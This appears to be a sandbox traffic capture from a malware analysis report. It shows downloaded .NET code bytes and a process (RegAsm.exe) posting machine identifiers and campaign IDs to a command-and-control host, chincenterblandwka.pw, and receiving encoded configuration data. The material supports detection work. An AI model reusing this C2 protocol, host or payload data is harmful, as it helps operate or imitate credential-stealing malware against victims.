2023-12-27 17:12:19 UTC	1024	IN	Data Raw: 30 02 00 1b 00 00 00 22 00 00 11 00 02 28 44 13 00 06 13 00 38 00 00 00 00 38 05 00 00 00 38 00 00 00 00 11 00 2a 00 52 38 02 00 00 00 00 2a 00 02 03 6f cd 03 00 06 38 f1 ff ff ff 00 00 00 32 02 7b f8 00 00 04 38 00 00 00 00 2a 00 00 00 36 02 03 7d f8 00 00 04 38 00 00 00 00 2a 00 00 13 30 02 00 20 00 00 00 15 00 00 11 38 0d 00 00 00 38 05 00 00 00 38 00 00 00 00 11 00 2a 00 02 6f d0 03 00 06 13 00 38 e5 ff ff ff 3e 00 02 03 6f d1 03 00 06 38 00 00 00 00 00 2a 32 02 7b f9 00 00 04 38 00 00 00 00 2a 00 00 00 4a 38 01 00 00 00 2a 02 03 7d f9 00 00 04 38 f3 ff ff ff 00 13 30 02 00 20 00 00 00 23 00 00 11 38 0d 00 00 00 38 05 00 00 00 38 00 00 00 00 11 00 2a 00 02 6f d4 03 00 06 13 00 38 e5 ff ff ff 3e 00 02 03 6f d5 03 00 06 38 00 00 00 00 00 2a 32 02 7b fa Data Ascii: 0"(D888R8o82{86}80 888o8>o82{8J8}80 #888o8>o82{
2023-12-27 17:12:19 UTC	16384	IN	Data Raw: 02 7b 02 01 00 04 38 00 00 00 00 2a 00 00 00 36 02 03 7d 02 01 00 04 38 00 00 00 00 2a 00 00 13 30 02 00 1b 00 00 00 23 00 00 11 00 02 28 49 13 00 06 13 00 38 03 00 00 00 11 00 2a 38 f8 ff ff ff 38 f3 ff ff ff 00 52 38 02 00 00 00 00 2a 00 02 03 28 4a 13 00 06 38 f1 ff ff ff 00 00 00 32 02 7b 03 01 00 04 38 00 00 00 00 2a 00 00 00 4a 38 01 00 00 00 2a 02 03 7d 03 01 00 04 38 f3 ff ff ff 00 13 30 02 00 1b 00 00 00 16 00 00 11 00 02 6f fc 03 00 06 13 00 38 03 00 00 00 11 00 2a 38 f8 ff ff ff 38 f3 ff ff ff 00 3e 00 02 03 28 4b 13 00 06 38 00 00 00 00 00 2a 32 02 7b 04 01 00 04 38 00 00 00 00 2a 00 00 00 4a 38 01 00 00 00 2a 02 03 7d 04 01 00 04 38 f3 ff ff ff 00 13 30 02 00 20 00 00 00 1a 00 00 11 38 0d 00 00 00 38 05 00 00 00 38 00 00 00 00 11 00 2a 00 02 Data Ascii: {86}80#(I888R8(J82{8J8}80o888>(K82{8J8}80 888*
2023-12-27 17:12:19 UTC	1024	IN	Data Raw: 13 00 38 e5 ff ff ff 52 38 02 00 00 00 00 2a 00 02 03 6f 9d 06 00 06 38 f1 ff ff ff 00 00 00 32 02 7b ac 01 00 04 38 00 00 00 00 2a 00 00 00 36 02 03 7d ac 01 00 04 38 00 00 00 00 2a 00 00 13 30 02 00 20 00 00 00 19 00 00 11 38 0a 00 00 00 38 13 00 00 00 38 0e 00 00 00 00 02 6f a0 06 00 06 13 00 38 e8 ff ff ff 11 00 2a 3e 00 02 03 6f a1 06 00 06 38 00 00 00 00 00 2a 32 02 7b ad 01 00 04 38 00 00 00 00 2a 00 00 00 36 02 03 7d ad 01 00 04 38 00 00 00 00 2a 00 00 13 30 02 00 1b 00 00 00 1e 00 00 11 00 02 6f a4 06 00 06 13 00 38 03 00 00 00 11 00 2a 38 f8 ff ff ff 38 f3 ff ff ff 00 3e 00 02 03 6f a5 06 00 06 38 00 00 00 00 00 2a 32 02 7b ae 01 00 04 38 00 00 00 00 2a 00 00 00 36 02 03 7d ae 01 00 04 38 00 00 00 00 2a 00 00 13 30 02 00 20 00 00 00 15 00 00 11 Data Ascii: 8R8o82{86}80 888o8>o82{86}80o888>o82{86}8*0
2023-12-27 17:12:19 UTC	16384	IN	Data Raw: 38 01 00 00 00 2a 02 03 7d b6 01 00 04 38 f3 ff ff ff 00 13 30 02 00 20 00 00 00 1a 00 00 11 38 0d 00 00 00 38 05 00 00 00 38 00 00 00 00 11 00 2a 00 02 28 9d 13 00 06 13 00 38 e5 ff ff ff 3e 00 02 03 6f c9 06 00 06 38 00 00 00 00 00 2a 32 02 7b b7 01 00 04 38 00 00 00 00 2a 00 00 00 4a 38 01 00 00 00 2a 02 03 7d b7 01 00 04 38 f3 ff ff ff 00 13 30 02 00 20 00 00 00 1c 00 00 11 38 0a 00 00 00 38 13 00 00 00 38 0e 00 00 00 00 02 6f cc 06 00 06 13 00 38 e8 ff ff ff 11 00 2a 3e 00 02 03 6f cd 06 00 06 38 00 00 00 00 00 2a 32 02 7b b8 01 00 04 38 00 00 00 00 2a 00 00 00 36 02 03 7d b8 01 00 04 38 00 00 00 00 2a 00 00 13 30 02 00 1b 00 00 00 1e 00 00 11 00 02 6f d0 06 00 06 13 00 38 03 00 00 00 11 00 2a 38 f8 ff ff ff 38 f3 ff ff ff 00 52 38 02 00 00 00 00 2a Data Ascii: 8}80 888(8>o82{8J8}80 888o8>o82{86}80o888R8*
2023-12-27 17:12:19 UTC	1024	IN	Data Raw: 02 7b 60 02 00 04 38 00 00 00 00 2a 00 00 00 4a 38 01 00 00 00 2a 02 03 7d 60 02 00 04 38 f3 ff ff ff 00 13 30 02 00 20 00 00 00 11 00 00 11 38 0a 00 00 00 38 13 00 00 00 38 0e 00 00 00 00 02 28 e8 13 00 06 13 00 38 e8 ff ff ff 11 00 2a 52 38 02 00 00 00 00 2a 00 02 03 6f 71 09 00 06 38 f1 ff ff ff 00 00 00 32 02 7b 61 02 00 04 38 00 00 00 00 2a 00 00 00 4a 38 01 00 00 00 2a 02 03 7d 61 02 00 04 38 f3 ff ff ff 00 13 30 02 00 20 00 00 00 1a 00 00 11 38 0d 00 00 00 38 05 00 00 00 38 00 00 00 00 11 00 2a 00 02 6f 74 09 00 06 13 00 38 e5 ff ff ff 52 38 02 00 00 00 00 2a 00 02 03 6f 75 09 00 06 38 f1 ff ff ff 00 00 00 32 02 7b 62 02 00 04 38 00 00 00 00 2a 00 00 00 36 02 03 7d 62 02 00 04 38 00 00 00 00 2a 00 00 13 30 02 00 1b 00 00 00 1b 00 00 11 00 02 28 e9 Data Ascii: {`8J8}`80 888(8R8oq82{a8J8}a80 888ot8R8ou82{b86}b80(
2023-12-27 17:12:19 UTC	16384	IN	Data Raw: 2a 00 02 28 ee 13 00 06 13 00 38 e5 ff ff ff 3e 00 02 03 6f 99 09 00 06 38 00 00 00 00 00 2a 32 02 7b 6b 02 00 04 38 00 00 00 00 2a 00 00 00 36 02 03 7d 6b 02 00 04 38 00 00 00 00 2a 00 00 13 30 02 00 1b 00 00 00 12 00 00 11 00 02 6f 9c 09 00 06 13 00 38 00 00 00 00 38 05 00 00 00 38 00 00 00 00 11 00 2a 00 3e 00 02 03 28 ef 13 00 06 38 00 00 00 00 00 2a 32 02 7b 6c 02 00 04 38 00 00 00 00 2a 00 00 00 36 02 03 7d 6c 02 00 04 38 00 00 00 00 2a 00 00 13 30 02 00 1b 00 00 00 20 00 00 11 00 02 6f a0 09 00 06 13 00 38 03 00 00 00 11 00 2a 38 f8 ff ff ff 38 f3 ff ff ff 00 52 38 02 00 00 00 00 2a 00 02 03 28 f0 13 00 06 38 f1 ff ff ff 00 00 00 32 02 7b 6d 02 00 04 38 00 00 00 00 2a 00 00 00 36 02 03 7d 6d 02 00 04 38 00 00 00 00 2a 00 00 13 30 02 00 1b 00 00 00 Data Ascii: (8>o82{k86}k80o888>(82{l86}l80 o888R8(82{m86}m80
2023-12-27 17:12:19 UTC	1024	IN	Data Raw: 00 00 11 00 02 6f 3c 0c 00 06 13 00 38 00 00 00 00 38 05 00 00 00 38 00 00 00 00 11 00 2a 00 3e 00 02 03 6f 3d 0c 00 06 38 00 00 00 00 00 2a 32 02 7b 14 03 00 04 38 00 00 00 00 2a 00 00 00 36 02 03 7d 14 03 00 04 38 00 00 00 00 2a 00 00 13 30 02 00 20 00 00 00 1c 00 00 11 38 03 00 00 00 11 00 2a 00 02 6f 40 0c 00 06 13 00 38 00 00 00 00 38 ea ff ff ff 38 e5 ff ff ff 3e 00 02 03 28 43 14 00 06 38 00 00 00 00 00 2a 32 02 7b 15 03 00 04 38 00 00 00 00 2a 00 00 00 4a 38 01 00 00 00 2a 02 03 7d 15 03 00 04 38 f3 ff ff ff 00 13 30 02 00 1b 00 00 00 23 00 00 11 00 02 28 44 14 00 06 13 00 38 00 00 00 00 38 05 00 00 00 38 00 00 00 00 11 00 2a 00 3e 00 02 03 6f 45 0c 00 06 38 00 00 00 00 00 2a 32 02 7b 16 03 00 04 38 00 00 00 00 2a 00 00 00 36 02 03 7d 16 03 00 04 Data Ascii: o<888>o=82{86}80 8o@888>(C82{8J8}80#(D888>oE82{8*6}
2023-12-27 17:12:19 UTC	16384	IN	Data Raw: 00 00 00 36 02 03 7d 1e 03 00 04 38 00 00 00 00 2a 00 00 13 30 02 00 20 00 00 00 1e 00 00 11 38 0d 00 00 00 38 05 00 00 00 38 00 00 00 00 11 00 2a 00 02 6f 68 0c 00 06 13 00 38 e5 ff ff ff 3e 00 02 03 6f 69 0c 00 06 38 00 00 00 00 00 2a 32 02 7b 1f 03 00 04 38 00 00 00 00 2a 00 00 00 4a 38 01 00 00 00 2a 02 03 7d 1f 03 00 04 38 f3 ff ff ff 00 13 30 02 00 1b 00 00 00 14 00 00 11 00 02 6f 6c 0c 00 06 13 00 38 00 00 00 00 38 05 00 00 00 38 00 00 00 00 11 00 2a 00 52 38 02 00 00 00 00 2a 00 02 03 28 47 14 00 06 38 f1 ff ff ff 00 00 00 32 02 7b 20 03 00 04 38 00 00 00 00 2a 00 00 00 4a 38 01 00 00 00 2a 02 03 7d 20 03 00 04 38 f3 ff ff ff 00 13 30 02 00 20 00 00 00 22 00 00 11 38 0d 00 00 00 38 05 00 00 00 38 00 00 00 00 11 00 2a 00 02 6f 70 0c 00 06 13 00 38 Data Ascii: 6}80 888oh8>oi82{8J8}80ol888R8(G82{ 8J8} 80 "888op8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49740	104.21.64.47	443	2992	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2023-12-27 17:12:39 UTC	268	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: chincenterblandwka.pw
2023-12-27 17:12:39 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2023-12-27 17:12:40 UTC	1329	IN	HTTP/1.1 200 OK Date: Wed, 27 Dec 2023 17:12:40 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=9rm2alvl30ulfe8nrqbga689e6; expires=Sun, 21-Apr-2024 10:59:19 GMT; Max-Age=9999999; path=/ Set-Cookie: xdober_setting_show_country=1; expires=Sun, 25-Feb-2024 17:12:40 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_use_round=1; expires=Sun, 25-Feb-2024 17:12:40 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_round_n=2; expires=Sun, 25-Feb-2024 17:12:40 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=pmGQRUUACkUsuuRNKzeRsEgAtPI%2FCEhMlPD%2FKIOO87%2B8K91YSvD4vRqUubXCy80AH%2BN1geTZpIr6t0zNkN2W7O1PdjP9PVMNWXdo1m92BOjPtvBwwTAvvOlDwFE1Vm2B1WV5DmCAIZ0%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 83c33090789ee95e-DFW alt-svc: h3=":443"; ma=86400
2023-12-27 17:12:40 UTC	7	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
2023-12-27 17:12:40 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49743	104.21.64.47	443	2992	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2023-12-27 17:12:40 UTC	285	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 635 Host: chincenterblandwka.pw
2023-12-27 17:12:40 UTC	635	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 31 45 42 44 36 33 46 45 34 37 41 46 31 30 45 33 46 34 41 35 32 44 39 46 31 36 42 37 36 39 30 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 43 52 4f 4e 39 39 2d 2d 4c 69 76 65 54 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"21EBD63FE47AF10E3F4A52D9F16B7690--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"CRON99--LiveT
2023-12-27 17:12:41 UTC	1329	IN	HTTP/1.1 200 OK Date: Wed, 27 Dec 2023 17:12:41 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=pc4u83mid3h1degrtfkalq76ps; expires=Sun, 21-Apr-2024 10:59:20 GMT; Max-Age=9999999; path=/ Set-Cookie: xdober_setting_show_country=1; expires=Sun, 25-Feb-2024 17:12:41 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_use_round=1; expires=Sun, 25-Feb-2024 17:12:41 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_round_n=2; expires=Sun, 25-Feb-2024 17:12:41 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=%2B7idbb9o9sCzApXaplpklwZqt21JiU7XlA4IyBzlO7ON3JCbXHCYVc7B9rgubY%2FInXDhSz0NKxHh7ViqLlEBb9Ko61nb4rre2quF8KdoEfDQ%2FgJ5%2Bg9HBVDeWxBDyZL500ghZOQP7Gc%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 83c3309758112cd8-DFW alt-svc: h3=":443"; ma=86400
2023-12-27 17:12:41 UTC	28	IN	Data Raw: 31 36 0d 0a 44 65 62 75 67 20 64 61 74 61 20 69 73 20 64 69 73 61 62 6c 65 64 0d 0a Data Ascii: 16Debug data is disabled
2023-12-27 17:12:41 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49744	104.21.64.47	443	2992	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2023-12-27 17:12:41 UTC	269	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 60 Host: chincenterblandwka.pw
2023-12-27 17:12:41 UTC	60	OUT	Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 43 52 4f 4e 39 39 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 26 6a 3d 64 65 66 61 75 6c 74 Data Ascii: act=recive_message&ver=4.0&lid=CRON99--LiveTraffic&j=default
2023-12-27 17:12:42 UTC	1325	IN	HTTP/1.1 200 OK Date: Wed, 27 Dec 2023 17:12:42 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=28fctaeg2sfr9ruj8nea46acsf; expires=Sun, 21-Apr-2024 10:59:20 GMT; Max-Age=9999999; path=/ Set-Cookie: xdober_setting_show_country=1; expires=Sun, 25-Feb-2024 17:12:41 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_use_round=1; expires=Sun, 25-Feb-2024 17:12:41 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_round_n=2; expires=Sun, 25-Feb-2024 17:12:41 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=0NkO4hKT5qJQF2lDW1Lif82zd%2FL2cnWSiiT6d4BEf5IB5l7M2Wy9xkGz21yGQO7vvn%2Bkw49Jvxa5Z1RlCK6ldZUK3YmqZ0aBH7NnXhtUodjHSps6A0HWfOniC41XOLl3dg0IDGq0T64%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 83c3309cdef34863-DFW alt-svc: h3=":443"; ma=86400
2023-12-27 17:12:42 UTC	44	IN	Data Raw: 32 64 30 61 0d 0a 33 79 49 45 39 66 5a 4b 70 77 72 74 54 41 79 4a 7a 52 67 54 76 48 33 53 4f 39 52 4f 56 41 6b 69 52 75 46 54 74 5a Data Ascii: 2d0a3yIE9fZKpwrtTAyJzRgTvH3SO9ROVAkiRuFTtZ
2023-12-27 17:12:42 UTC	1369	IN	Data Raw: 78 4d 7a 77 43 6b 4c 77 37 56 31 6d 71 48 4b 4a 74 75 4e 71 6e 35 4e 42 36 32 58 66 49 62 39 47 77 6e 62 41 42 38 77 53 66 48 36 53 6e 6a 44 64 55 43 4a 4e 58 57 61 4d 5a 75 7a 33 59 73 37 36 78 30 59 4e 6c 52 33 7a 48 30 62 6e 51 70 41 43 4f 5a 63 59 2b 38 46 38 49 4b 2f 77 49 6b 31 64 5a 71 33 41 66 6e 62 43 79 70 37 54 67 7a 6e 46 33 77 58 72 70 73 62 69 6b 41 49 34 73 78 31 50 41 75 72 6d 75 77 55 6d 69 57 6e 69 62 41 59 6f 67 76 61 4f 69 68 64 58 62 5a 47 4c 4e 52 75 69 63 35 59 55 39 6b 7a 56 36 2f 76 47 7a 76 49 50 38 43 4a 4e 58 55 4c 39 30 6f 31 32 77 75 78 4b 68 73 63 76 45 63 6f 56 44 32 51 31 34 70 41 6d 62 42 63 35 58 68 59 4d 49 4b 31 67 49 6b 6a 76 74 41 72 67 50 50 4b 57 4b 72 39 7a 67 78 31 68 4f 2b 58 4c 55 6a 4d 57 70 41 4e 6f 77 78 31 Data Ascii: xMzwCkLw7V1mqHKJtuNqn5NB62XfIb9GwnbAB8wSfH6SnjDdUCJNXWaMZuz3Ys76x0YNlR3zH0bnQpACOZcY+8F8IK/wIk1dZq3AfnbCyp7TgznF3wXrpsbikAI4sx1PAurmuwUmiWnibAYogvaOihdXbZGLNRuic5YU9kzV6/vGzvIP8CJNXUL90o12wuxKhscvEcoVD2Q14pAmbBc5XhYMIK1gIkjvtArgPPKWKr9zgx1hO+XLUjMWpANowx1
2023-12-27 17:12:42 UTC	1369	IN	Data Raw: 36 2f 77 42 75 6c 35 49 72 79 47 6d 44 4b 57 58 67 70 48 5a 2b 31 68 2b 34 56 37 4d 76 4f 47 46 42 49 34 30 30 31 2f 6b 6d 6f 6d 36 32 52 69 62 5a 2b 30 43 48 4b 73 31 73 4c 4b 6e 74 4f 44 48 5a 42 2f 41 42 39 47 77 61 59 45 51 79 6d 48 47 34 6c 6d 7a 76 49 50 38 43 4a 49 6a 61 52 36 30 71 7a 57 77 73 71 65 31 6a 48 72 5a 64 38 68 76 30 62 6e 51 70 41 6d 53 45 50 5a 65 6d 62 4f 31 68 75 55 42 6e 6c 35 77 36 78 58 71 4c 4c 57 6a 6c 70 6e 56 37 30 52 36 2b 55 37 38 72 4d 57 5a 47 4b 34 41 2b 31 76 6f 67 72 43 4c 7a 4c 77 37 56 31 6d 71 48 4b 73 31 73 4c 4b 75 6f 59 6a 47 47 58 66 42 32 74 54 6f 38 4b 79 39 4d 77 58 4f 56 76 47 7a 76 66 66 4d 76 44 74 58 57 61 6f 63 71 7a 54 63 42 67 2b 30 34 4d 35 78 64 38 68 76 30 62 44 46 6e 41 48 7a 42 63 64 33 79 4b 71 Data Ascii: 6/wBul5IryGmDKWXgpHZ+1h+4V7MvOGFBI4001/kmom62RibZ+0CHKs1sLKntODHZB/AB9GwaYEQymHG4lmzvIP8CJIjaR60qzWwsqe1jHrZd8hv0bnQpAmSEPZembO1huUBnl5w6xXqLLWjlpnV70R6+U78rMWZGK4A+1vogrCLzLw7V1mqHKs1sLKuoYjGGXfB2tTo8Ky9MwXOVvGzvffMvDtXWaocqzTcBg+04M5xd8hv0bDFnAHzBcd3yKq
2023-12-27 17:12:42 UTC	1369	IN	Data Raw: 4a 4e 58 57 61 6f 63 6f 69 43 49 75 73 2b 30 36 66 64 30 54 75 46 61 77 4a 54 70 68 53 53 2b 50 4f 74 50 79 4a 36 68 6b 76 45 56 6a 6c 70 41 6b 7a 32 36 4d 4c 57 48 6b 6f 48 49 78 6b 48 44 59 47 2f 52 75 64 43 6b 43 5a 73 46 78 30 4f 5a 75 39 53 44 39 5a 58 47 63 6d 69 36 46 42 2b 64 73 4c 4b 6e 74 4f 44 50 42 55 64 38 78 39 47 35 30 4b 51 4a 6d 6d 6c 36 2f 76 47 7a 76 49 50 38 43 4a 4e 58 55 4c 38 6b 6f 31 32 77 75 35 36 5a 38 64 39 73 54 73 56 2b 2b 4b 54 35 76 51 53 4b 46 4d 74 6a 36 4b 36 78 74 75 55 78 6f 6e 5a 55 70 79 57 4f 41 4a 57 75 72 34 52 55 5a 6e 46 33 79 47 2f 52 75 64 43 6b 41 49 35 74 78 6a 37 78 75 6e 47 47 72 56 33 61 62 31 45 65 74 4b 73 31 73 4c 4b 6e 74 5a 54 2b 78 64 2f 49 62 39 47 35 30 4b 56 6c 4c 36 33 4f 56 76 47 7a 76 49 50 38 Data Ascii: JNXWaocoiCIus+06fd0TuFawJTphSS+POtPyJ6hkvEVjlpAkz26MLWHkoHIxkHDYG/RudCkCZsFx0OZu9SD9ZXGcmi6FB+dsLKntODPBUd8x9G50KQJmml6/vGzvIP8CJNXUL8ko12wu56Z8d9sTsV++KT5vQSKFMtj6K6xtuUxonZUpyWOAJWur4RUZnF3yG/RudCkAI5txj7xunGGrV3ab1EetKs1sLKntZT+xd/Ib9G50KVlL63OVvGzvIP8
2023-12-27 17:12:42 UTC	1369	IN	Data Raw: 79 4c 49 5a 70 30 71 61 4f 43 73 64 48 6e 62 46 37 52 54 75 79 4d 39 59 55 6b 73 67 7a 37 53 39 69 57 72 62 4c 78 47 61 70 72 55 5a 71 6f 41 7a 57 77 73 71 65 30 34 4d 35 78 66 74 30 48 32 64 48 51 72 5a 7a 36 4f 4e 38 44 76 47 36 70 69 37 41 41 4a 2f 39 5a 71 68 79 72 4e 62 48 47 6c 78 42 55 5a 74 56 33 79 51 4e 6c 45 64 43 6b 43 5a 73 46 7a 6c 62 78 75 71 6d 37 39 47 43 54 58 6b 43 4c 46 5a 59 55 6c 59 65 69 6f 64 48 48 54 46 61 4a 52 74 69 77 34 62 55 45 6f 68 6a 44 62 2f 54 79 68 5a 4c 42 47 62 6f 58 55 5a 71 6f 41 7a 57 77 73 71 65 30 34 4d 35 78 66 74 30 48 32 64 48 51 72 59 43 2b 50 4d 74 76 2f 4b 5a 68 68 73 30 35 68 67 64 52 48 72 53 72 4e 62 43 79 70 37 57 55 2f 74 58 44 59 4d 76 52 75 4c 77 51 6f 5a 73 46 7a 6c 62 78 73 37 79 44 39 52 32 72 58 Data Ascii: yLIZp0qaOCsdHnbF7RTuyM9YUksgz7S9iWrbLxGaprUZqoAzWwsqe04M5xft0H2dHQrZz6ON8DvG6pi7AAJ/9ZqhyrNbHGlxBUZtV3yQNlEdCkCZsFzlbxuqm79GCTXkCLFZYUlYeiodHHTFaJRtiw4bUEohjDb/TyhZLBGboXUZqoAzWwsqe04M5xft0H2dHQrYC+PMtv/KZhhs05hgdRHrSrNbCyp7WU/tXDYMvRuLwQoZsFzlbxs7yD9R2rX
2023-12-27 17:12:42 UTC	1369	IN	Data Raw: 72 4e 62 43 7a 30 34 52 55 5a 6e 46 33 79 47 2f 52 75 4c 77 51 6f 5a 73 46 7a 6c 62 78 73 37 79 44 39 52 32 72 58 7a 47 71 46 61 59 4d 68 62 65 53 73 65 58 44 55 44 61 4a 56 76 79 51 7a 5a 30 73 71 68 53 50 52 38 53 65 75 59 62 52 48 62 70 75 65 4b 38 49 6f 77 55 45 47 71 65 30 34 4d 35 78 64 38 68 76 32 4b 79 34 72 47 47 62 44 45 73 44 75 49 2b 30 4e 31 51 49 6b 31 64 5a 71 68 33 66 42 51 51 61 70 37 54 67 7a 6e 46 32 70 4e 74 35 75 64 43 6b 43 5a 73 46 7a 6c 62 34 70 6f 53 4c 6c 41 69 61 66 6d 53 44 50 62 49 67 6a 61 65 32 6d 61 48 6a 62 45 62 42 64 76 53 4d 77 62 30 4d 6b 6b 54 66 54 39 69 32 67 62 37 4e 44 59 74 66 61 52 36 30 71 7a 57 77 73 71 65 30 34 4d 35 34 59 71 42 6e 75 62 6e 5a 5a 54 53 71 59 50 74 44 76 4a 4f 30 4e 31 51 49 6b 31 64 5a 71 68 Data Ascii: rNbCz04RUZnF3yG/RuLwQoZsFzlbxs7yD9R2rXzGqFaYMhbeSseXDUDaJVvyQzZ0sqhSPR8SeuYbRHbpueK8IowUEGqe04M5xd8hv2Ky4rGGbDEsDuI+0N1QIk1dZqh3fBQQap7TgznF2pNt5udCkCZsFzlb4poSLlAiafmSDPbIgjae2maHjbEbBdvSMwb0MkkTfT9i2gb7NDYtfaR60qzWwsqe04M54YqBnubnZZTSqYPtDvJO0N1QIk1dZqh
2023-12-27 17:12:42 UTC	1369	IN	Data Raw: 43 36 4c 35 77 4d 2f 6b 46 70 6c 36 36 50 54 31 6d 54 47 54 73 57 5a 57 38 62 4f 38 67 2f 31 38 6f 2b 50 78 71 68 79 72 4e 62 43 7a 79 77 42 49 7a 6e 46 33 79 47 2f 52 75 64 43 74 48 4b 4d 4e 70 6c 62 34 75 72 47 2b 76 52 57 65 64 6e 69 58 4e 5a 34 6f 72 59 65 2b 72 63 58 2f 4d 45 62 39 5a 73 43 63 33 62 6b 4d 76 69 54 2f 65 37 47 37 6a 44 64 55 43 4a 4e 58 57 61 6f 63 71 7a 57 35 70 38 2b 38 69 4d 35 34 31 71 31 69 37 49 48 52 46 53 7a 4b 45 63 2f 62 77 4a 61 70 75 71 77 41 4a 2f 39 5a 71 68 79 72 4e 62 48 47 6c 77 42 49 7a 6e 46 33 79 47 2f 51 31 57 51 4d 43 5a 73 46 7a 6c 62 78 73 37 79 4b 36 54 43 62 50 31 6d 6a 4d 5a 6f 4d 74 61 65 4f 6e 66 33 48 56 48 37 39 54 75 43 73 6b 59 55 77 75 6b 54 37 55 38 79 71 67 61 4c 68 4a 64 4a 4b 64 4c 6f 55 6d 34 45 Data Ascii: 